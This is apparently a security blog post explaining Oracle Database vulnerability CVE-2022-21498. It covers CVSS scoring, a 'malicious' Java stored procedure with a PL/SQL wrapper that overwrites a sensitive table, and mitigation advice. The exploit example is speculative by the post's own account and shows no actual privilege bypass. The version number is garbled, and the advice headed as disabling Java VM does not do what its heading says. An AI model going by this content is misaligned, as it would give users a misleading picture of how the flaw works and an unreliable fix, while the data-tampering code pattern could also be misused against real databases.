On April 19, 2022, Oracle published a security advisory for CVE-2022-21498, detailing a serious vulnerability in the Java VM component of the Oracle Database Server. This flaw is easy to exploit, potentially allowing a low-privileged user who has the CREATE PROCEDURE privilege to gain unauthorized write access to critical data—all via network protocols. Supported Oracle Database versions affected by this vulnerability are 12.1..2, 19c, and 21c.
Let’s dig into the details, see how an exploit might work, and understand how to stay protected.
CVSS v3.1 Score: 6.5 (Moderate)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Reference Links
- NIST NVD CVE-2022-21498
- Oracle Critical Patch Update Advisory - April 2022
- Full List of Oracle Database Security Patches
Impact
If you run Oracle Database and use Java VM, a user with some coding skills and just the CREATE PROCEDURE privilege could:
Compromise all data reachable through Java procedures
No need for direct admin access; network reach is enough.
Technical Details (Exploit Example)
Note: Oracle has not released the complete exploit details for this vulnerability, but based on public info, here’s how an attack could look. The problem lies in how the Java VM executes user-defined code, which may permit altering data or objects unexpectedly.
Target database is running Oracle Java VM.
The attacker creates a Java stored procedure that maliciously accesses and modifies sensitive tables.
Example: Malicious Java Procedure in Oracle
-- Step 1: Write Java code directly in the database
CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "EvilClass" AS
public class EvilClass {
public static void evilUpdate() throws Exception {
java.sql.Connection conn =
java.sql.DriverManager.getConnection("jdbc:default:connection:");
java.sql.Statement stmt = conn.createStatement();
// Update critical table!
stmt.executeUpdate("UPDATE sensitive_data SET owner='attacker'");
stmt.close();
conn.close();
}
};
/
-- Step 2: Publish a PL/SQL wrapper around the Java method
CREATE OR REPLACE PROCEDURE evil_update
AS LANGUAGE JAVA
NAME 'EvilClass.evilUpdate()';
/
-- Step 3: execute the malicious procedure
BEGIN
evil_update();
END;
/
Executes an UPDATE (could just as easily DELETE, INSERT, or even DROP tables).
- The PL/SQL wrapper publishes this Java method as an Oracle procedure. On execution, critical tables are silently modified.
Why is this bad? With only basic privileges, the attacker can use the Java VM *inside* Oracle to bypass normal access controls, manipulating or destroying data.
Note: Oracle Java VM procedures run with powerful permissions by default, unless DBAs have implemented strict sandboxing—most haven't.
Mitigation
Oracle's Advice: Patch immediately!
- April 2022 CPU patches fully address CVE-2022-21498.
Revoke unnecessary CREATE PROCEDURE privileges.
- Disable/lock Java VM if not in use:
`sql
EXEC DBMS_JAVA.REVOKE_PERMISSION('PUBLIC', 'java.io.FilePermission', '/-', 'read,write,execute,delete');
`
- Monitor failed logins and unusual Java/PLSQL activity.
Conclusion
CVE-2022-21498 is a textbook example of how legacy or rarely-used features (like Java VM in Oracle) can cause big headaches when not properly secured. Attackers with only minimal privileges and no direct admin access can use easy procedural tricks to seriously compromise database integrity. If you run Oracle Database (12.1..2, 19c, or 21c), patch now and review all low-privilege users who have the CREATE PROCEDURE permission.
Further Reading
- Oracle Java in the Database - Security Overview
- CERT Vulnerability Note VU#227812
- Oracle Database Security Best Practices
If you have any questions or want advice on identifying risks in your Oracle deployment, let us know in the comments!
Timeline
Published on: 04/19/2022 21:15:00 UTC
Last modified on: 04/28/2022 15:52:00 UTC